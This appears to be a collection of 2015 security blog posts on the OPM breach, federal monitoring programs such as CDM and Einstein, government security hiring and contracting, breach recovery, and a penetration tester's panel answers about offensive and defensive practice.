Because one of the major roadblocks to real improvement is the infrequency of organizations willingly
admitting – publicly or even, often, to themselves – that they’re having a
really tough time with security…..mainly because exactly this
type of villagers-with-torches response occurs when they do.

Being unable to admit difficulty/failure, they’re unable to work publicly together
or with other institutions and organizations to collectively figure out a way
forward.

Im sure OPM committed all sorts of infosec sins. Im sure they acted
with classically government idiocy in some respects.

But they would have been compromised anyway by the people who
compromised them in order to get the data that was gotten. Just like
everyone else.

If we can stop making things so damn adversarial, maybe we’ll be able
to get together and stop….losing….so badly.

Part 2 (Response to a lot of dialogue):

Thanks for all the thoughtful responses so far. FWIW, I suggest
taking my points in total, as they were meant to be:

1. L* and A* are right, you can protect “the crown jewels” if you
try hard enough. But, that’s really not enough to reduce the
environmental conflict level, so it really is only an intense holding
pattern.

2. While this is possible, everyone is making mistakes anyway – it’s
just a matter of degree of mistakes. In fact, that’s the deep nature
of the problem: It’s too hard to not screw up eventually (even
protecting crown jewels).

3. Some companies make “better” mistakes than others
(Kaspersky/LastPass’s post exploitation activities being a good
example of “better mistakes”), but it’s a matter of degree of mistake
vs a matter of “not doing some that we
know sustainably works with a sufficiently low error rate”

4. Although the government (or any organization with important data)
should, from a “fairness” perspective, be held to a higher level of
accountability, from a practical standpoint, that’s actually not
*helpful* at this stage – which was the central point of my original
post. This is because:

5. …even if we hold everyone who needs to be held accountable to
make the “best mistakes” possible, it doesn’t get us where we need to
be ***and*** has the side affect of creating an environment which is
hostile to admission of failure.

6. Without candid admission that “we need a whole new re-think of this
problem space”, we’re going to keep doing the insane – more of the
same and expecting different results. Further investing in infosec as
we know it, or limiting protection to crown jewels, simply delays the
inevitable.

7. The “inevitable” without change is a level of constant hostility
and conflict that will escalate until even protecting the crown jewels
will not be sufficient for people to be able to do business
economically online (or until the profitability/value curve for the
adversaries flattens).

8. So instead of beating up OPM, we should be taking a long hard look
at the very long list of crappy companies and excellent companies who
have been breached and ask ourselves “What’s missing”

9. Because, right now, a list of “InfoSec Best Practices” is a list of
activities that aren’t sustainably working.

Filed under: Critical Infrastructure Protection, Cybersecurity General, Risk Management Theory Tagged: memory loss, OPM Hack, stupid government

The Tragedy of the Bloomberg Code Issue

Richard Bejtlich — Sat, 20 Jun 2015 09:13:00 +0000

Last week I Tweeted about the Bloomberg "code" issue. I said I didn't know how to think about it. The issue is a 28,000+ word document, enough to qualify as a book, that's been covered by news outlets like the Huffington Post.

I approached the document with an open mind. When I opened my mail box last week, I didn't expect to get a 112 page magazine devoted to explaining the importance of software to non-technical people. It was a welcome surprise.

This morning I decided to try to read some of the issue. (It's been a busy week.) I opened the table of contents, shown at left. It took me a moment, but I realized none of the article titles mentioned security.

Next I visited the online edition, which contains the entire print version and adds additional content. I searched the text for the word "security." These are the results:

Security research specialists love to party.

I have been asked if I was physical security (despite security wearing very distinctive uniforms),” wrote Erica Joy Baker on Medium.com who has worked, among other places, at Google.

Can we not rathole on Mailinator before we talk overall security?

We didn’t talk about password length, the number of letters and symbols necessary for passwords to be secure, or whether our password strategy on this site will fit in with the overall security profile of the company, which is the responsibility of a different division.

Ditto many of the security concerns that arise when building websites, the typical abuses people perpetrate.

“First, I needed to pass everything through the security team, which was five months of review,” TMitTB says, “and then it took me weeks to get a working development environment, so I had my developers sneaking out to Starbucks to check in their code. …”

In Fortran, and I ask to see your security clearance.

If you're counting, that's eight instances of "security" in seven sentences. There's no mention of "software security." There's a small discussion about "e-mail validation," but it's printed to show how broken software development meetings can be.

Searching for "hack" yields two references to "Hacker News" and this sentence talking about the perils of the PHP programming language:

Everything was always broken, and people were always hacking into my sites.

There is one result for "breach," but it has nothing to do with security incidents. The only time the word "incident" appears is in a sentence talking about programming conference attendees behaving badly.

In brief, a 112 page magazine devoted to the importance of software has absolutely nothing useful to say about software security. Arguably, it says absolutely nothing on software security.

When someone communicates, what he or she doesn't say can be as important as what he or she does say.

In the case of this magazine, it's clear that software security is not on the minds of the professional programmer who wrote the issue. It's also not a concern of the editor or any of the team that contributed to it.

From what I have seen, that neglect is not unique to Bloomberg.

That is the tragedy of the Bloomberg code issue, and it remains a contributing factor to the decades of breaches we have been suffering.

Air Force Enlisted Ratings Remain Dysfunctional

Richard Bejtlich — Fri, 19 Jun 2015 20:08:00 +0000

I just read Firewall 5s are history: Quotas for top ratings announced in Air Force Times. It describes an effort to eliminate the so-called "firewall 5" policy with a new "forced distribution" approach:

The Air Force's old enlisted promotion system was heavily criticized by airmen for out-of-control grade inflation that came with its five-point numerical rating system. There were no limits on how many airmen could get the maximum: five out of five points [aka "firewall 5"]. As a result nearly everyone got a 5 rating.

As more and more raters gave their airmen 5s on their EPR [ Enlisted Performance Report], the firewall 5 became a common occurrence received by some 90 percent of airmen. And this meant the old EPR was effectively useless at trying to differentiate between levels of performance...

Under the new system, [Brig. Gen. Brian Kelly, director of military force management policy] said in a June 12 interview at the Pentagon, the numerical ratings are gone — and firewall 5s will be impossible...

The quotas — or as the Air Force calls them, "forced distribution" — will be one of the final elements to be put in place in the service's massive overhaul of its enlisted promotion process, which has been in the works for three years...

Only the top 5 percent, at most, of senior airmen, staff sergeants and technical sergeants who are up for promotion to the next rank will be deemed "promote now" and get the full 250 EPR points...

The quotas for the next tier of airmen — who will be deemed "must promote" and will get 220 out of 250 EPR points — will differ based on their rank. Kelly said that up to 15 percent of senior airmen who are eligible for promotion to staff sergeant can receive a "must promote" rating, and up to 10 percent of staff sergeants and tech sergeants up for promotion to technical and master sergeant can get that rating, and the accompanying 220 points.

The next three ratings — "promote," "not ready now" and "do not promote" — will each earn airmen 200, 150 and 50 points, respectively. But there will be no limit on how many airmen can get those ratings. (emphasis added)

I am not an expert on the enlisted performance rating system. In some ways, I think the EPR is superior to the corresponding system for officers, because enlisted personnel take tests whose scores influence their promotion potential.

However, upon reading this story, it reminded me of my 2012 post How to Kill Teams Through "Stack Ranking", which cited a Vanity Fair article about Microsoft's old promotion system:

[Author Kurt] Eichenwald’s conversations reveal that a management system known as “stack ranking” — a program that forces every unit to declare a certain percentage of employees as top performers, good performers, average, and poor — effectively crippled Microsoft’s ability to innovate.

“Every current and former Microsoft employee I interviewed — every one — cited stack ranking as the most destructive process inside of Microsoft, something that drove out untold numbers of employees,” Eichenwald writes.

This sounds uncomfortably like the new Air Force enlisted "forced distribution" system.

I was also reminded of another of my 2012 posts, Bejtlich's Thoughts on "Why Our Best Officers Are Leaving", which stressed the finding that

[V]eterans were shocked to look back at how “archaic and arbitrary” talent management was in the armed forces. Unlike industrial-era firms, and unlike the military, successful companies in the knowledge economy understand that nearly all value is embedded in their human capital. (emphasis added)

I am sure the Air Force is doing what it thinks is right by changing the EPR system. However, it's equivalent to making changes in a centrally planned economy, without abandoning central planning.

It's time the Air Force, and the rest of the military, discard their centrally-planned, promote-the-paper (instead of the person), involuntary assignment process.

In its place I recommend one that openly and competitively advertises and offers positions; gives pay, hiring, and firing authority to the local manager; and adopts similar aspects of sound private sector personnel management.

Today's knowledge economy demands that military personnel be treated as unique individuals, not industrial age interchangeable parts. Our military talent is one of the few competitive advantages we possess over peer rivals. We must not squander it with dysfunctional promotion systems.

Hard to Sprint When You Have Two Broken Legs

noreply@blogger.com (valsmith) — Sun, 14 Jun 2015 07:23:00 +0000

Today I saw this article: White House Tells Agencies to Tighten Up Cyber Defenses Immediately.

By Valsmith

Now as a disclaimer, I don't work for the government so there is a lot I don't know but I have friends who do or who have in the past and you hear things. I also pay attention and listen to questions I get in my training classes and conference talks.

This directive from the White House is laughable for a number of reasons and demonstrates just how out of touch decision makers in the Government are on these issues.

1.) Technically skilled people have been BEGGING to improve cyber security in the government for well over 15 years. I don't think this is any kind of secret, just google for a bit or talk to anyone who works in government in the trenches. Asking for staff, tools, budget, authority, support and getting little of it. In a way, this directive is insulting to them after years of asking, trying and failing suddenly someone says: "oh hey I have an idea, why don't you go and secure stuff!". Right. Unless you are going to supply those things they need RIGHT NOW, they will fail. And government procurement and hiring organizations are notoriously slow so the chances of that happening are slim.

2.) IT Operations. The first thing that has to be in place for there to be any real chance is solid IT operations. Organizations have to be able to push out images and patches quickly, orderly, and with assurance. Backup recovery, knowledge of inventory, well managed systems, etc. are all paramount. Do you know how most government IT operations are managed? By contractors, aka the lowest bidder. These are the Raytheons, Booz Allens, Boeings, Lockheeds, etc. who bid on large omnibus support contracts, win them, and THEN try to fill the staffing requirements. How do you win the lowest bid in services / support contracts? By keeping staffing costs down, aka paying the lowest possible salaries. This results in some of the most piss-poor IT operations in the world. You want to know why Hilary Clinton, former Secretaries of Defense, and numerous other government staff run their own private mail servers? Most likely its because their work provided email DOESN'T work. Slow systems, tiny inbox quotas, inability to handle attachments, downtime, no crypto or crypto incompatible with anyone else, these are just a few of the issues out there. And its not just email. I have personally seen a government conference room system take 15-20 minutes to log in at the windows login prompt, due too poor IT practices. I was told that most of the time people resorted to paper hand outs or overhead projectors. Yeh like the ones you had in highschool in the 90s with the light bulbs and transparencies.

Essentially what this directive is saying: "Hey you low end IT staff, winners of the lowest bid, who can barely keep a network up or run a mail server, make sure you become infosec experts and shore up our defenses, and you have 30 days to do it." Right. I have heard horror stories from acquaintances in the government of waiting 6 months for an initial account setup ticket to get performed. Weeks to get a new desktop deployed. It is idiotic to think that current IT operations can support this kind of request. But that is who typically manages servers, network and desktops, and who would have to deploy whatever security tools would be needed to do this in support of pitifully small infosec teams.

3.) Infosec staff and hiring. There are none available. If they are good and employable they are employed at a better job making more money. And if there is, you (the government) can't engage them. The pay scales for well trained infosec professionals in industry are off the charts, regardless of degree or "clearability". Why would anyone in their right mind join a government agency (or worse a government contractor) and make 70k a year, be subject to clearance requirements (how many hackers you know smoke weed?), and live in a place like Washington DC? Patriotism might draw some but that only goes so far.

Many agencies have strict requirements for education standards, sometimes certifications, and years of experience. There are a lot of truly talented and skilled people who might be willing to fill these jobs but would never meet the outdated requirements that are designed for classic engineers and scientists. The government HR departments have not and maybe will never catch up to this fact. HR staff are not typically technically skilled, are not paid that great, and are trying to make decisions on things they don't understand or know much about. The deck is stacked against them being successful at recruiting and retaining the crack infosec staff that would be needed to achieve this directive. It also often takes 9 months on average to hire someone.

There exist a number of highly skilled and trustable boutiques so maybe the government would engage them to do this work right? OH, sorry, these things have to be bid out. To the lowest bidder. Who has a war chest to wait through the 18 month, highly costly, contracting process. Who can meet all the government requirements for accredited accounting systems, policies and procedures for asset management, the FARs (10000000000000s of pages of regulations governing these sorts of contracts), and who can defeat an incumbent like a Lockheed or Bechtel with all their lobbying power, war chests, and former insiders now working as federal service sales staff. Commercial contracts take 2 weeks and have and NDA / MSA, maybe some insurance. That's about it, so from a business decision standpoint would you put your time into bidding on a government contract or pursuing commercial ones as a small infosec company?

4.) Legacy systems. The government has everything you can imagine somewhere running something. I would not at all be surprised of OS2 Warp being in place somewhere. I have heard of VAXs running payrol systems. SPARC 10s as critical gateway servers for database applications. There is all this old stuff laying around, that few people understand anymore, that don't have great support or security guidelines, and often can't be updated. All a hacker has to do is compromise a windows workstation and wait for the victim to SSH, zmodem, telnet, or whatever ancient protocol they use to communicate to legacy systems and just take screenshots in order to get viably useful information. They dont even need to really know how to use the legacy systems to steal their data. Just hack someone who does and watch. To be fair this exists in industry as well, its not exclusive to the government, but it does greatly impact one's ability to fix security in 30 days.

5.) The wrong decisions makers. Senior management in government agencies as well as politicians are often woefully inexperienced with cyber technology and security in general. A series of tubes, nuff said. But they don't always have or listen to advisers who are. I have heard of cases where in emergency knee jerk situations physicists are put in charge of designing cyber-security systems while the infosec staff are standing around holding their well thought out plans for addressing the issues wondering what just happened. Maybe we should have the IDS guy design the next missile system?

And I'm not just picking on the federal government. Most states are in even worse shape. Few companies in the private sector could pull this off either. Especially any the size of a government agency.

I could go on for pages describing reasons this directive is silly, but you get the idea. Maybe what is really needed here is a new Manhattan Project. When we built the bomb we went and found all the best people we could, incentivized them, removed most of the shackles, funded the hell out of them and LET them do what they are good at with smart guardrails in place to protect national security. Feynman was 24 when he was put in charge of a theoretical division group helping to work on the bomb. Put the right people in charge of the right components. It's a hard problem and we need a lot of smart people to figure out what to do, but here are some starting ideas:

1.) Follow in Mudge's laudable attempt with the DARPA Cyber-Fast Track program and make it easier and quicker to engage small infosec firms.

2.) Change the contracting guidelines for pricing on infosec services. We are not making bullets or other process based widgets where going with the lowest bid makes sense.

3.) Change the hiring guidelines and either allow managers to make hiring decisions or train HR staff to understand the requirements better. Remove education requirements. PAY people competitive rates. (Govenment pensions are not what they used to be and neither is the stability of the job so stop acting like that is enough to make up for it). Allow managers to fire incompetent infosec staff with a minimum of red tape.

4.) Fix your IT operations! Get rid of the lowest bid contractor carousel and implement some real, performance based, competition! (When a new contractor wins they often just end up hiring the same people away from the old contractor and sucking just as bad).

5.) Change clearance requirements (this would need proper compartmentalization to prevent problems) for infosec staff so that you can get some of those talented but unclearable people helping you somehow.

6.) Figure out remote work. Nobody wants to live in DC.

7.) Bring in smart infosec industry people, educate them on some of the problems and realities, and have them brainstorm to see what they might come up with. And I don't mean a bunch of Mitre and Booz consultants. I mean people with a proven track record in private industry. Partner them with your few strong government infosec staff and see what happens.

8.) Stop talking about how you are going to "hire 1000 infosec professionals this year" or "fix security in 30 days" while the perfectly good private sector national resources who could actually help are languishing out in the world wishing they could while the big contractors rake in tax payer money and provide little value. You know where they are, go get them. Don't make them try to figure out the BAA process, its not worth it to them.

In the meantime, good luck sprinting on two broken legs.

V.

Redefining Breach Recovery

Richard Bejtlich — Sat, 13 Jun 2015 16:56:00 +0000

For too long, the definition of "breach recovery" has focused on returning information systems to a trustworthy state. The purpose of an incident response operation was to scope the extent of a compromise, remove the intruder if still present, and return the business information systems to pre-breach status. This is completely acceptable from the point of view of the computing architecture.

During the last ten years we have witnessed an evolution in thinking about the likelihood of breaches. When I published my first book in 2004, critics complained that my "assumption of breach" paradigm was defeatist and unrealistic. "Of course you could keep intruders out of the network, if you combined the right controls and technology," they claimed. A decade of massive breaches have demonstrated that preventing all intrusions is impossible, given the right combination of adversary skill and persistence, and lack of proper defensive strategy and operations.

We need to now move beyond the arena of breach recovery as a technical and computing problem. Every organization needs to think about how to recover the interests of its constituents, should the organization lose their data to an adversary. Data custodians need to change their business practices such that breaches are survivable from the perspective of the constituent. (By constituent I mean customers, employees, partners, vendors -- anyone dependent upon the practices of the data custodian.)

Compare the following scenarios.

If an intruder compromises your credit card, it is fairly painless for a consumer to recover. There is a $50 or less financial penalty. The bank or credit card company handles replacing the card. Credit monitoring and related services are generally adequate for limiting damage. Your new credit card is as functional as the old credit card.

If an intruder compromises your Social Security number, recovery may not be possible. The financial penalties are unbounded. There is no way to replace a stolen SSN. Credit monitoring and related services can only alert citizens to derivative misuse, and the victim must do most of the work to recover -- if possible. The citizen is at risk wherever other data custodians rely on SSNs for authentication purposes.

This SSN situation, and others, must change. All organizations who act as data custodians must evaluate the data in their control, and work to improve the breach recovery status for their constituents. For SSNs, this means eliminating their secrecy as a means of authentication. This will be a massive undertaking, but it is necessary.

It's time to redefine what it means to recover from a breach, and put constituent benefit at the heart of the matter, where it belongs.

My Federal Government Security Crash Program

Richard Bejtlich — Wed, 10 Jun 2015 19:52:00 +0000

In the wake of recent intrusions into government systems, multiple parties have been asking for my recommended courses of action.

In 2007, following public reporting on the 2006 State Department breach, I blogged When FISMA Bites, Initial Thoughts on Digital Security Hearing. and What Should the Feds Do. These posts captured my thoughts on the government's response to the State Department intrusion.

The situation then mirrors the current one well: outrage over an intrusion affecting government systems, China suspected as the culprit, and questions regarding why the government's approach to security does not seem to be working.

Following that breach, the State Department hired a new CISO who pioneered the "continuous monitoring" program, now called "Continuous Diagnostic Monitoring" (CDM). That CISO eventually left State for DHS, and brought CDM to the rest of the Federal government. He is now retired from Federal service, but CDM remains. Years later we're reading about another breach at the State Department, plus the recent OPM intrusions. CDM is not working.

My last post, Continuous Diagnostic Monitoring Does Not Detect Hackers, explained that although CDM is a necessary part of a security program, it should not be the priority. CDM is at heart a "Find and Fix Flaws Faster" program. We should not prioritize closing and locking doors and windows while there are intruders in the house. Accordingly, I recommend a "Detect and Respond" strategy first and foremost.

To implement that strategy, I recommend the following, three-phase approach. All phases can run concurrently.

Phase 1: Compromise Assessment: Assuming the Federal government can muster the motivation, resources, and authority, the Office of Management and Budget (OMB), or another agency such as DHS, should implement a government-wide compromise assessment. The compromise assessment involves deploying teams across government networks to perform point-in-time "hunting" missions to find, and if possible, remove, intruders. I suspect the "remove" part will be more than these teams can handle, given the scope of what I expect they will find. Nevertheless, simply finding all of the intruders, or a decent sample, should inspire additional defensive activities, and give authorities a true "score of the game."

Phase 2: Improve Network Visibility: The following five points include actions to gain enhanced, enduring, network-centric visibility on Federal networks. While network-centric approaches are not a panacea, they represent one of the best balances between cost, effectiveness, and minimized disruption to business operations.

1. Accelerate the deployment of Einstein 3A, to instrument all Federal network gateways. Einstein is not the platform to solve the Federal government's network visibility problem, but given the current situation, some visibility is better than no visibility. If the inline, "intrusion prevention system" (IPS) nature of Einstein 3A is being used as an excuse for slowly deploying the platform, then the IPS capability should be disabled and the "intrusion detection system" (IDS) mode should be the default. Waiting until the end of 2016 is not acceptable. Equivalent technology should have been deployed in the late 1990s.

2. Ensure DHS and US-CERT have the authority to provide centralizing monitoring of all deployed Einstein sensors. I imagine bureaucratic turf battles may have slowed Einstein deployment. "Who can see the data" is probably foremost among agency worries. DHS and US-CERT should be the home for centralized analysis of Einstein data. Monitored agencies should also be given access to the data, and DHS, US-CERT, and agencies should begin a dialogue on whom should have ultimately responsibility for acting on Einstein discoveries.

3. Ensure DHS and US-CERT are appropriately staffed to operate and utilize Einstein. Collected security data is of marginal value if no one is able to analyze, escalate, and respond to the data. DHS and US-CERT should set expectations for the amount of time that should elapse from the time of collection to the time of analysis, and staff the IR team to meet those requirements.

4. Conduct hunting operations to identify and remove threat actors already present in Federal networks. Now we arrive at the heart of the counter-intrusion operation. The purpose of improving network visibility with Einstein (for lack of an alternative at the moment) is to find intruders and eliminate them. This operation should be conducted in a coordinated manner, not in a whack-a-mole fashion that facilitates adversary persistence. This should be coordinated with the "hunt" mission in Phase 1.

5. Collect metrics on the nature of the counter-intrusion campaign and devise follow-on actions based on lessons learned. This operation will teach Federal network owners lessons about adversary campaigns and the unfortunate realities of the state of their enterprise. They must learn how to improve the speed, accuracy, and effectiveness of their defensive campaign, and how to prioritize countermeasures that have the greatest impact on the opponent. I expect they would begin considering additional detection and response technologies and processes, such as enterprise log management, host-based sweeping, modern inspection platforms with virtual execution and detonation chambers, and related approaches.

Phase 3. Continuous Diagnostic Monitoring, and Related Ongoing Efforts: You may be surprised to see that I am not calling for an end to CDM. Rather, CDM should not be the focus of Federal security measures. It is important to improve Federal security through CDM practices, such that it becomes more difficult for adversaries to gain access to government computers. I am also a fan of the Trusted Internet Connection program, whereby the government is consolidating the number of gateways to the Internet.

Note: I recommend anyone interested in details on this matter see my latest book, The Practice of Network Security Monitoring, especially chapter 9. In that chapter I describe how to run a network security monitoring operation, based on my experiences since the late 1990s.

Continuous Diagnostic Monitoring Does Not Detect Hackers

Richard Bejtlich — Tue, 09 Jun 2015 09:54:00 +0000

There is a dangerous misconception coloring the digital security debate in the Federal government. During the last week, in the wake of the breach at the Office of Personnel Management (OPM), I have been discussing countermeasures with many parties. Concerned officials, staffers, and media have asked me about the Einstein and Continuous Diagnostic Monitoring (CDM) programs. It has become abundantly clear to me that there is a fundamental misunderstanding about the nature of CDM. This post seeks to remedy that problem.

The story Federal cyber protection knocked as outdated, behind schedule by Cory Bennett unfortunately encapsulates the misunderstanding about Einstein and CDM:

The main system used by the federal government to protect sensitive data from hacks has been plagued by delays and criticism that it is already outdated — months before it is even fully implemented.

The Einstein system is intended to repel cyberattacks like the one revealed last week by the Office of Personnel Management (OPM)...

Critics say Einstein has been a multibillion-dollar boondoggle that is diverting attention away from the security overhaul that is needed...

To offset those shortcomings, officials in recent years started rolling out a Continuous Diagnostics and Mitigation (CDM) program, which searches for nefarious actors once they’re already in the networks. It’s meant to complement and eventually integrate with Einstein. (emphasis added)

The section I bolded and underlined is 100% false. CDM does not "search" for "nefarious actors" "in the networks." CDM is a vulnerability management program. Please see the figure at the upper left. It depicts the six phases of the CDM program:

Install/update "sensors." (More on this shortly)
Automated search for flaws.
Collect results from departments and agencies.
Triage and analyze results.
Fix worst flaws.
Report progress.

CDM searches for flaws (i.e., vulnerabilities), and Federal IT workers are supposed to then fix the flaws. The "sensors" mentioned in step 1 are vulnerability management and discovery platforms. They are not searching for intruders. You could be forgiven for misunderstanding what "sensor" means. Consider the following from the DHS CDM page:

The CDM program enables government entities to expand their continuous diagnostic capabilities by increasing their network sensor capacity, automating sensor collections, and prioritizing risk alerts.

Again, "sensor" here does not mean "sensing" to find intruders. The next paragraph says:

CDM offers commercial off-the-shelf (COTS) tools, with robust terms for technical modernization as threats change. First, agency-installed sensors perform an automated search for known cyber flaws. Results feed into a local dashboard that produces customized reports, alerting network managers to their worst and most critical cyber risks based on standardized and weighted risk scores. Prioritized alerts enable agencies to efficiently allocate resources based on the severity of the risk. Progress reports track results, which can be used to compare security posture among department/agency networks. Summary information can feed into an enterprise-level dashboard to inform and situational awareness into cybersecurity risk posture across the federal government.

The "situational awareness" here means configuration and patch status, not intrusion status.

I captured the CMD figure from US-CERT's Continuous Diagnostic Monitoring program overview (pdf). It also appears on the DHS CDM page. The US-CERT program Web page lists the core tools used for CDM as the following:

Intro to Hardware Asset Management (HWAM)
Intro to Software Asset Management (SWAM)
Intro to Vulnerability Management (VUL)
Intro to Configuration Settings Management (CSM)

As you can see, CDM is about managing infrastructure, not detecting and responding to intruders. Don't be fooled by the "monitoring" in the term CDM; "monitoring" here means looking for flaws.

In contrast, Einstein is an intrusion detection and prevention platform. It is a network-based system that uses threat signatures to identify indications of compromise observable in network traffic. Einstein 1 and 2 were more like traditional IDS technologies, while Einstein 3 and 3 accelerated are more like IDP technologies.

Critics of my characterization might say "CDM is more than faster patching." According to the GSA page on CDM, CDM as I described earlier is only phase 1:

Endpoint Integrity

HWAM – Hardware Asset Management
SWAM – Software Asset Management
CSM – Configuration Settings Management
VUL – Vulnerability Management

Phase 2 will include the following:

Least Privilege and Infrastructure Integrity

TRUST –Access Control Management (Trust in People Granted Access)
BEHAVE – Security-Related Behavior Management
CRED – Credentials and Authentication Management
PRIV – Privileges

Phase 3 will include the following:

Boundary Protection and Event Management for Managing the Security Lifecycle

Plan for Events
Respond to Events
Generic Audit/Monitoring
Document Requirements, Policy, etc.
Quality Management
Risk Management
Boundary Protection – Network, Physical, Virtual

What do you not see listed in any of these phases? Aside from "respond to events," which does not appear to mean intrusions, I still see no strong focus on detecting and responding to intrusions. CDM beyond phase 1 is still just dealing with "cyber hygiene." Unfortunately, even the President does not have the proper strategic focus. As reported by the Hill:

President Obama acknowledged that one of the United States’s problems is that it has a “very old system.”

“What we are doing is going agency by agency and figuring out what can we fix with better practices and better computer hygiene by personnel, and where do we need new systems and new infrastructure in order to protect information,”

Don't misunderstand my criticism of CDM as praise for Einstein. At the very least, Einstein, or a technology like it, should have been deployed across the Federal government while I was still in uniform, 15 years ago. We had equivalent technology in the Air Force 20 years ago. (See the foreword for my latest book online for history.)

Furthermore, I'm not saying that CDM is a bad approach. All of the CDM phases are needed. I understand that intruders are going to have an easy time getting back into a poorly secured network.

My goal with this post is to show that CDM is either being sold as, or misunderstood as, a way to detect intruders. CDM is not an intrusion detection program; CDM is a vulnerability management program, a method to Find and Fix Flaws Faster. CDM should have been called "F^4, F4, or 4F" to capture this strategic approach.

The focus on CDM has meant intruders already present in Federal networks are left to steal and fortify their positions, while scarce IT resources are devoted to patching. The Feds are identifying and locking doors and windows while intruders are inside the house.

It's time for a new (yet ideologically very old) strategy: find the intruders in the network, remove them, and then conduct counter-intrusion campaigns to stop them from accomplishing their mission when they inevitably return. CDM is the real "multibillion-dollar boondoggle that is diverting attention away from the security overhaul that is needed." The OPM breach is only the latest consequence of the misguided CDM-centric strategy.

Introducing Falcon's View Consulting

Ben Tomhave — Mon, 08 Jun 2015 13:59:01 +0000

I'm pleased to announce the formation of Falcon's View Consulting! This new business will initially be available on a part-time basis to provide security architecture advisory, "consulting CISO," and cybersecurity product marketing and strategy services.

More details will provided in the near future, but until then I wanted to get the official word out there. Feel free to ping me on Twitter (@falconsview) or email me (tomhave-at-secureconsulting-dot-net) for more information. I look forward to hearing from you!

Answers to Questions from the nVisium SecCasts Panel

noreply@blogger.com (CG) — Thu, 28 May 2015 12:23:00 +0000

I was asked to be on on a panel for nVisium's SecCasts. Our episode should be out next week, so spoiler alert...my answers are below:

If readers/friends/community want additional details on something let me know.

Here are the answers to the questions I received ahead of time

- What security projects are you currently interested in?

* Still interested in metasploit.
* current things I'm working on is pentesting at scale and continuously. Pentest tools aren't great for diffing results across scans with large numbers of hosts. It can be a challenge identifying all of X in an environment then performing actions against it to test for vulnerabilities.
* osquery is pretty interesting

- What technologies are you currently looking into?

* Devops tools are really fun for me right now. They are essentially botnet controllers...meaning they are designed to do a task against multiple machines quickly. Their security model leaves quite a bit to be desired. Their model is essentially, that if you can talk to the application you are trusted, which is horrible.

* AWS has tons of neat things that I want to start looking in to

* OSX exploitation

- What are some of the latest offensive security trends?

* Not sure this is necessarily a trend, but initial access vectors are always interesting to me. Especially as browser/memory corruption bugs are going away && they never ever work, pdfs/flash is better, default protections in office products, java has slowly been tightening the screws. People will still open and run things but I wonder how that will look 5 years from now.

* The concepts in server side browsing talk by Nicolas Gregoire is also interesting to me
http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf

- How to use an internal RT in the best way
* continuous testing
* internal people have skin in the game
* understanding the environment a bit more in a mature or well monitored enviro
* breach assessments
* training for other teams
* not dropping problems on people and saying see ya
* work with SOC/NOC/incident responders/application owners

- What should defenders be concerned about or paying attention to?

* Establishing a baseline of what is normal network traffic wise, so you can alert on what is abnormal (not trivial)
* Effectively parsing tons of log data to create alerts on interesting events (not trivial)
* Creating a system that encourages users to report suspicious things and have a team that responds to those reports in a reasonable amount of time. If you don't respond (in a reasonable amount of time) this very much de-incentivizes users to report (easier to do--at least from a technical perspective)
* Know what you own and monitor it

- What areas should security folks be focused on in the next 3-4 years?

* How to make SSL/TLS, email encryption, 2fac more accessible to everyone
* Bridging the gap between recommendation to fix and execution of fixes (not trivial). we can do better with our recommendations. A lot of time we say stuff like, have better passwords or dont allow X but sometimes stopping X is really really hard, no one knows the best way to do it or its going to be a lot of work to do that. It can be overwhelming to fix. result...you see it next year on your pentest.
* Engineering better tools for everyone to use. I'm SUPER guilty of releasing works for me code, but we need to do better about engineering good tools for more people to use

- Having worked both sides (offense and defense), has this changed your perspective? If so, how?

* Fixing is way harder than breaking.
* Mature companies should be purple teaming, Where the offensive guys sit with the defenders to iteratively improve over time. Removing the adversarial relationship is key for internal teams to work together in a better way.

- What are your thoughts on the so called "stunt hacking" as of late and all the crazy branding behind vulnerabilities like shellshock, heartbleed, etc.

* Behind most stunt hacking is a really bug/vuln/exploit. I don't want those to go away. I also understand that people/businesses want to get paid and also that researchers have no control over the *PR releases* that marketing puts out though. At Lares we didn't win a RFP because someone had written a tool, the person selecting the company to do the work based the final decision on that. so I guess marketing is necessary evil. However I'm a believer in putting the full issue out there. Checkpoint's dealing with the misfortune cookie issue is a good example of how NOT to do things in my opinion. they had enough time to come up with fancy marketing materials and clever name for the issue but never released exploit code. Without code, no exploit, no exploit people don't give a crap. its sad but true. And the fortune cookie issue is a prime example. no exploit for it, no one cares, problem isn't getting fixed. Cool catchphrase and logo + exploit code == stuff gets exploited, fixed, and awareness generated...much better.

- What is the security community getting right?
* We are doing better with responsible disclosure despite some companies really really sucking at working with researchers
* Volume of information being put out there via conferences & blogs...arguably too much

- Where could the community improve?
* Consistency of testing and reporting. PTES was an attempt at this but lots of work still to be done.

* Touched on it above. we give crap recommendations to clients. We need to do better on our recommendations to fix problems. it sounds trivial but we bitch and moan about clients being too stupid to do what we tell them but we give them little to no resources to actually fix issues. Free business idea is for PT companies to partner with companies that can/want to fix these issues like hardening routers or creating secure baselines or GPOs. most pentest companies don't want to do this, another camp says its a conflict of interest. The fix is to at least have a few places companies can immediately turn to get some help if the pentesters company doesn't want to do it.

-Follow on by Rob: awareness trainings vs technical controls
* Mostly in agreement. Technical controls should be better to prevent more things that we say users should catch/report. On the other hand, security awareness transcends work and moves into home computer usage, education of others, and ideally more awareness in the real world (think 419 scams, 3 card monty scams, people selling you stuff door to door, etc). Facebook's Hacktober carries value all year long http://www.adweek.com/socialtimes/how-to-hacktober/439382 so the human element of social engineering can not be fully fixed by technology.

- Name the top 1-3 books you think every security person should read this year.

*The Phoenix Project by Gene Kim to understand how devops can work in an enterprise but also so we don't become the security guy with the black binder in the book who is perceived as doing nothing but creating unnecessary work.
*Zero to One by Peter Thiel to understand what makes a good startup or idea (TLDR does the company solve a huge problem --aka go zero to one or does it just iterate on something somewhat solved). Its also a good way to see why companies in SV have some of the policies they have.
* No Place to Hide by Greenwald (and Snowden) -- why and how it all played out is interesting despite your feelings on the action itself.

- What are your favorite sites or resources for information, tools, etc.
* twitter
* blogs although it seems less and less people are blogging. Not sure where all that information is going
* NoVA Hackers

- What advice would you give a person entering the security field or who wants to get into it?
* Don't
* Learn webapps
* Learn python/ruby/javascript
* Learn/have patience with clients. They aren't as smart as you (or as smart as you think you are) and have tons of other stuff to do besides fix the issues you found
* If solving puzzles doesn't interest you, pick something else.
* If you don't want to have to continually learn new things...FOR THE REST OF YOUR CAREER...pick something else.

- (Assuming not answered in the previous question) What value do you place on a college degree (in terms of entering the field)?
* Not required but there is something to be said for being a well rounded individual which the core/required classes they make you take in college attempt to make you learn. From a life hacking perspective it has values as people automatically assume things based on having finished college or having a particular cert or having an MBA or whatever. Not necessarily good or valid but it is what it is.

